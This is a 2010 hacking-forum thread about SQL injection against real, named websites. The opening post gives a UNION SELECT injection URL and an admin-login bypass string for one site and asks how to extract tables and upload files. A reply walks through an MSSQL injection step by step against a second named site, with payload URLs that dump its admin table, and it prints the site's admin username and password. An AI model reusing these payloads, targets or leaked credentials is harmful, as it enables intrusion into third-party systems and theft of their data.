[x]
We are happy to see you on AH
AH - AndhraHackers
is a place to entertain as well to spread knowledge around.
One of the most exciting Indian Community over Internet.
We would like you to
Join
AH Forum Today.
Why to JOIN AH forum ?
You will become part of one of the fastest growing Indian Community
Show your writings skills with millions around the web through AH
Talk about hot topics and issues of IT Security
Ask questions and get answers from Experts from AH.
Daily technology updates, news, reviews
Register Now -
Its FREE
Andhra Hackers , Indian Hackers , Indian Cyber Warriors , Ethical Hackers Forum
°l||l° HacKing/Exploits Zone °l||l°
»
Basic Hacking
»
sql injection quries doesnt work anymore on this domain
Username:
1 Hour
1 Day
1 Week
1 Month
Forever
Password:
Home
Help
Search
Quick Search
Advanced Search
[Close]
Terms of Service
Login
Register
Pages: [
1
]
Go Down
« previous
next »
Print
Author
Topic: sql injection quries doesnt work anymore on this domain (Read 191 times)
0 Members and 1 Guest are viewing this topic.
massmailer
n00b
Karma: +0/-1
Offline
Posts: 6
sql injection quries doesnt work anymore on this domain
«
on:
February 14, 2010, 11:07:41 AM »
http://www.dmkstone.com/new.asp?thickness=-2%20UNION%20ALL%20SELECT%20column_name,2%20FROM%20information_schema.columns
we can login into that site using sql injection code in admin area 1' or '1'='1
But i dont want to hack any site
i want to learn how to get table name and database name or how to upload files on this site
i tried a lot it didnt work for me
think its a test , try to work on the site
not to hack , just to learn
Logged
Andhra Hackers , Indian Hackers , Indian Cyber Warriors , Ethical Hackers Forum
sql injection quries doesnt work anymore on this domain
«
on:
February 14, 2010, 11:07:41 AM »
Logged
lucky
n00b
Karma: +5/-2
Offline
Posts: 17
For InDiA AnY ThInG
Re: sql injection quries doesnt work anymore on this domain
«
Reply #1 on:
March 31, 2010, 01:35:05 PM »
I dont know why its not working but here this might help u doing so..
yeo all ... m going to write tutorial of mssql (asp) injection ..
so in this we need , an mssql vulnerable site and abit time
so lets start i got this one
http://www.fpcci.com.pk
here is the vulnerable page of site
http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985
so .. we can check vulnerability by using this ' sign like simple sql injection .
if our site is vulnerable we will get error like this
ok now we got the error means site is vul .. lets move to next point , now we need to find column numbers to get em we will do same like simple sql injection but we in this we will use # instead of -- at the end of out query .
so now our URL will look like
http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985 order by 1#
keep on trying this order by command till we get error like
i got error on 16 it means site have 15 colums . voila
so now in next step we need name of a table to get number of largets visible column from all .. let me explain bit , like in simple sql injection we use union select 1,2,3,4,5,6 -- and we get a number to get information from site , in this we need a table name to get that number of visible column ,
so to get that number we are going to add name of table after union select 1,2,3,4,5,6,7,8,9, ......,15
in this scripts of getting table names dont work most times i tried some of them so we will add name of tables manually normally name of tables are " admin,tbladmin,tbl_admin,user,users,login,info,email" etc . in my site i got table name admin so m going to use it now . now our url will look like
Code:
http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from admin#
after this we will get number of largest visible colum which we can use to get data from site . here i got 3,7and 6
so now we are going to use 3 to get information now all we have to do is just put the name of colum instead of 3 in string and we will get username and password ,
now our url will look like
Code:
http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985%20union%20select%201,2,name,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin#
and done we got the username here
username is
Code:
farrukh
and then change colum name with passwords colum name
Code:
http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985%20union%20select%201,2,password,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin#
you will get the password ;)here we got the password that is
Code:
fpcci#f
hopes it will help u , in this type of injection we dont get much working scripts to get tables etc if i get working ones i will update this tut soon[/b]
Logged
Andhra Hackers , Indian Hackers , Indian Cyber Warriors , Ethical Hackers Forum
Logged
Pages: [
1
]
Go Up
Print
« previous
next »
Jump to:
Please select a destination:
-----------------------------
°l||l° AH HeadQuarters °l||l°
-----------------------------
=> News, Rules and Announcements
=> Feedbacks, Suggestions and Support
=> Introduction
=> Seminars Feedback & Suggestions
-----------------------------
°l||l° INDIA °l||l°
-----------------------------
=> General Discussions
=> Politics
=> Our Culture
=> Hinduism
=> INDIA Vision 2020
-----------------------------
°l||l° HacKing/Exploits Zone °l||l°
-----------------------------
=> General Discussions
=> Problems & Solutions
=> Basic Hacking
=> Web Application Hacking & Security
=> Wireless Hacking & Security
=> Exploits
=> HacKing Tut.
=> Hacking Tools™
===> Vuln Scanners
===> Exploitation Tools
=> SQL Injection
=> Botnets, Zombies and IRC Bots
=> Phishing & Sniffing
=> RFI , LFI , XSS , Shells etc
=> Cryptography, Encryption, and Decryption
=> Video tutorials
=> Tips & Trix™
-----------------------------
°l||l° Viruses & Malware °l||l°
-----------------------------
=> Sysinternals
=> Keyloggers
=> Trojans & Remote Admin Tools , Removal tools
=> Programming Viruses
=> Problems & Solutions
-----------------------------
°l||l° Mobile Hacking & Security °l||l°
-----------------------------
=> Jar
=> Symbian
=> Smart Phones
=> Mobile Hacking & Security
=> Mobile Tips & Trix
-----------------------------
°l||l° Developers Corner °l||l°
-----------------------------
=> C , C++
=> WEB Applications & Tools (ASP.net , PHP , JSP , Servlets )
=> WPF , WCF , WF, CS , XAML , LINQ
=> VC# , VB.Net ( .Net) (Desktop based apps)
=> J2SE , J2EE , J2ME (Java)
=> PERL, PYTHON, ASM Other . . .
=> Databases (Oracle, MY SQL , MS SQL )
=> Multimedia & Animations
=> Problems n Solutions
-----------------------------
°l||l° Operating Systems °l||l°
-----------------------------
=> Linux
=> Developer Resources
=> Windows
===> API
===> Server 2008
===> Vista
===> XP
===> Windows 7
=> Tips n Tricks
-----------------------------
°l||l° Students Corner °l||l°
-----------------------------
=> Events & Competitions
=> General Discussions
=> Academic Projects
=> Placement Papers
=> Certification
===> Microsoft
===> Cisco
===> Others
-----------------------------
°l||l° Hardware n Networking °l||l°
-----------------------------
=> Networking Problems n Solutions
=> Hardware Problems n Solutions
-----------------------------
°l||l° Gfx Zone °l||l°
-----------------------------
=> GFX Request
=> GFX ShowOff
=> GfX Tutorials
-----------------------------
°l||l° Webmaster's Zone °l||l°
-----------------------------
=> SEO Workshop
=> Webmaster's Tools
-----------------------------
°l||l° Relax n Njoyment Board °l||l°
-----------------------------
=> Masala News
=> Cooool Stuffff
=> Take it easy
=> SMS
=> Wallpapers
=> Bollywood / Tollywood Corner
Loading...